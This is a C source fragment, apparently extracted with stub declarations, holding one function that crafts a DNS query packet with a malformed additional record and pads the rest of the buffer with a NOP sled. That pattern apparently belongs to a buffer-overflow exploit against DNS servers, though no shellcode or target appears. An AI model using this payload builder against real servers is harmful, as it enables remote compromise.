
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_char ;


 int BUF_SIZE ;
 int NOP ;
 int memcpy (int *,int *,unsigned int) ;
 int memset (int *,int ,int) ;
 int printf (char*,int) ;
 unsigned int strlen (int *) ;
 int * strtok (int *,char*) ;

__attribute__((used)) static void
zbuffami (u_char * zbuf, u_char *domain)
{
  u_char *ptr, *bgn, *end;

  ptr = zbuf;
  *ptr++ = 0x69;
  *ptr++ = 0x69;
  *ptr++ = 0x28;
  *ptr++ = 0x80;
  *ptr++ = 0x00;
  *ptr++ = 0x01;
  *ptr++ = 0x00;
  *ptr++ = 0x01;
  *ptr++ = 0x00;
  *ptr++ = 0x01;
  *ptr++ = 0x00;
  *ptr++ = 0x00;


  bgn = strtok (domain, ".");
  while (bgn != ((void*)0))
    {
      unsigned int len;

      len = strlen (bgn);
      *ptr++ = len;
      memcpy (ptr, bgn, len);
      ptr += len;

      bgn = strtok (((void*)0), ".");
    }
  *ptr++ = 0x00;

  *ptr++ = 0x00;
  *ptr++ = 0x06;
  *ptr++ = 0xff;
  *ptr++ = 0xff;


  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x00;
  *ptr++ = 0x01;
  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;
  *ptr++ = 0xff;


  printf ("NOP: %d\n", BUF_SIZE - (ptr - zbuf));
  memset (ptr, NOP, BUF_SIZE - (ptr - zbuf));
}
